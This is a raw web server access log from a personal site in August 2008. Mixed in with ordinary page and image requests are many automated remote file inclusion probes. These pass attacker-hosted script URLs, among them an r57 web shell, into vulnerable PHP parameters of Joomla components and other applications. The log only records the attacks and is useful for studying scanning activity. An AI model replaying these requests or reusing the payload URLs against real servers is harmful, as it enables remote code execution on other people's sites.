213.33.84.163 - - [28/Aug/2008:11:17:04 -0700] "GET /logs//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:17:04 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=3&order=FileNum&order_type=DESC HTTP/1.1" 200 33091 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:17:15 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=4&order=FileNum&order_type=DESC HTTP/1.1" 200 33220 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=3&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:17:18 -0700] "GET /logs/access_080724.log//agendax/addevent.inc.php?agendax_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:17:18 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:17:18 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:17:20 -0700] "GET /logs/access_080121.log/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:17:20 -0700] "GET /errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:17:20 -0700] "GET /logs/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:17:28 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=3&order=FileNum&order_type=DESC HTTP/1.1" 200 33091 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=4&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:17:28 -0700] "GET /logs/access_071222.log/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:17:33 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0153.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
207.210.89.58 - - [28/Aug/2008:11:17:34 -0700] "GET /logs/access_080313.log/index3.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:17:35 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=FileNum&order_type=DESC HTTP/1.1" 200 32894 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=3&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:17:36 -0700] "GET /logs/access_080510.log//agendax/addevent.inc.php?agendax_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:17:42 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=5&order=FileNum&order_type=DESC HTTP/1.1" 200 32948 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:17:50 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=6&order=FileNum&order_type=DESC HTTP/1.1" 200 33036 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=5&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:18:14 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33112 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=6&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
209.172.33.53 - - [28/Aug/2008:11:18:21 -0700] "GET /logs/access_080223.log//?path%5Bdocroot%5D=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.172.33.53 - - [28/Aug/2008:11:18:27 -0700] "GET //?path%5Bdocroot%5D=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 200 85131 "-" "libwww-perl/5.811" "www.dmulk.com"
128.177.28.235 - - [28/Aug/2008:11:18:27 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.177.28.235 - - [28/Aug/2008:11:18:27 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.33.53 - - [28/Aug/2008:11:18:33 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 200 62576 "-" "libwww-perl/5.811" "www.dmulk.com"
209.172.33.53 - - [28/Aug/2008:11:18:40 -0700] "GET /logs/access_080225.log//?path%5Bdocroot%5D=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:18:50 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:18:50 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:18:50 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:18:51 -0700] "GET /logs/access_080102.log//Neos_Chronos/header.php?base_folder=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:11:18:52 -0700] "GET /index.php?seccion=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 200 85183 "-" "libwww-perl/5.810" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:18:58 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:18:58 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:19:10 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:19:12 -0700] "GET //index.php?DOCUMENT_ROOT=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 200 85123 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:19:12 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.111.11.7 - - [28/Aug/2008:11:19:29 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [28/Aug/2008:11:19:30 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:19:32 -0700] "GET /logs/access_080801.log//include/admin.lib.inc.php?site_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:19:33 -0700] "GET //include/admin.lib.inc.php?site_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:19:33 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:19:39 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:20:06 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0046.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:20:10 -0700] "GET /logs/access_080718.log//include/admin.lib.inc.php?site_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:20:10 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0022.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:20:33 -0700] "GET /logs/access_080810.log/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:20:33 -0700] "GET /errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:20:33 -0700] "GET /logs/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:11:20:40 -0700] "GET /logs/access_071122.log HTTP/1.0" 200 35217 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:20:45 -0700] "GET /logs/access_080127.log//Neos_Chronos/header.php?base_folder=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
62.149.67.49 - - [28/Aug/2008:11:20:54 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.15.134.248 - - [28/Aug/2008:11:21:00 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
80.15.134.248 - - [28/Aug/2008:11:21:00 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
80.15.134.248 - - [28/Aug/2008:11:21:00 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
80.15.134.248 - - [28/Aug/2008:11:21:01 -0700] "GET /logs/access_080127.log//Neos_Chronos/header.php?base_folder=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
80.15.134.248 - - [28/Aug/2008:11:21:11 -0700] "GET /logs/access_080102.log//Neos_Chronos/header.php?base_folder=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:11:21:12 -0700] "GET /logs/access_080808.log/index.php?seccion=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:21:13 -0700] "GET /logs/access_080703.log/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:21:14 -0700] "GET /logs/access_080324.log//components/com_flyspray/startdown.php?file=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:21:20 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0053.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
201.75.234.35 - - [28/Aug/2008:11:21:23 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:21:49 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:21:49 -0700] "GET //Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:11:21:55 -0700] "GET /logs/access_080806.log//e404.php?DOCUMENT_ROOT=https://www.ba-sat.com/sunshop/images/products/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:11:21:55 -0700] "GET //e404.php?DOCUMENT_ROOT=https://www.ba-sat.com/sunshop/images/products/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:11:21:55 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=https://www.ba-sat.com/sunshop/images/products/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:11:21:58 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:11:21:58 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.220 - - [28/Aug/2008:11:22:04 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0147.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "dmulk.com"
189.57.19.178 - - [28/Aug/2008:11:22:07 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:11:22:10 -0700] "GET /bikes/cb750K6/?S=D HTTP/1.0" 200 1610 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:22:41 -0700] "GET /errors.php?error=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:22:43 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0023.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:22:56 -0700] "GET /errors.php?error=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:11:23:08 -0700] "GET /logs/access_080710.log//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:11:23:10 -0700] "GET //index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 200 85427 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:11:23:10 -0700] "GET /logs//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:23:26 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0082.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:24:28 -0700] "GET /logs/access_080519.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:24:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:24:29 -0700] "GET /logs/access_080519.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:24:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:24:29 -0700] "GET /logs/access_080517.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:24:41 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:24:43 -0700] "GET //include/admin.lib.inc.php?site_path=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:24:46 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:24:48 -0700] "GET /logs/access_080519.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:24:49 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:24:49 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:24:50 -0700] "GET /logs/access_080519.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:24:50 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:24:51 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:24:51 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:25:20 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:11:25:22 -0700] "GET /logs/access_080601.log%20//?path%5Bdocroot%5D=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:11:25:23 -0700] "GET /logs/access_080711.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:25:27 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:26:07 -0700] "GET /logs/access_080821.log/errors.php?error=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:26:18 -0700] "GET /logs/access_080407.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:26:19 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:26:19 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.177.28.235 - - [28/Aug/2008:11:26:23 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.177.28.235 - - [28/Aug/2008:11:26:23 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.177.28.235 - - [28/Aug/2008:11:26:24 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.177.28.235 - - [28/Aug/2008:11:26:31 -0700] "GET /logs/access_080308.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:11:26:38 -0700] "GET /logs/access_080223.log//?mosConfig_absolute_path=%034https://www.ba-sat.com/sunshop/images/products/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:11:26:39 -0700] "GET /logs//?mosConfig_absolute_path=%034https://www.ba-sat.com/sunshop/images/products/id.txt??? HTTP/1.1" 200 62576 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:11:26:39 -0700] "GET //?mosConfig_absolute_path=%034https://www.ba-sat.com/sunshop/images/products/id.txt??? HTTP/1.1" 200 85251 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:11:26:42 -0700] "GET /logs/access_080518.log//?mosConfig_absolute_path=%034https://www.ba-sat.com/sunshop/images/products/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.89.58 - - [28/Aug/2008:11:26:50 -0700] "GET /index3.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:26:52 -0700] "GET /modify.php?dir_module=http://primeraconchali.cl/modules/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:26:52 -0700] "GET /logs/modify.php?dir_module=http://primeraconchali.cl/modules/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:26:52 -0700] "GET /logs/access_080229.log/modify.php?dir_module=http://primeraconchali.cl/modules/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
